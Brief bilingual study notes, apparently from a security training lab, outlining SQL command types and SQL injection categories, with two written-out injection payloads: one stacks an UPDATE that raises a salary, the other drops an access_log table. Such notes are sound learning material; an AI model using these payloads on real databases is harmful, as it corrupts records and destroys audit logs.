语法基本 #
SQL

DML

DDL

DCL
@'%'是MySQL专用的user@host模型,这里用户名要当identifier用,而不是'string literal'

SQLi类别 #
String SQL injection

Numeric SQL injection

SQLi - CIA #
SQLi - Compromising Confidentiality

SQLi - Compromising Integrity
' or '1'='1';update employees set salary = 99999 where auth_tan = '3SL99A' --

SQLi - Compromising Availability
1'; drop table access_log;-- 
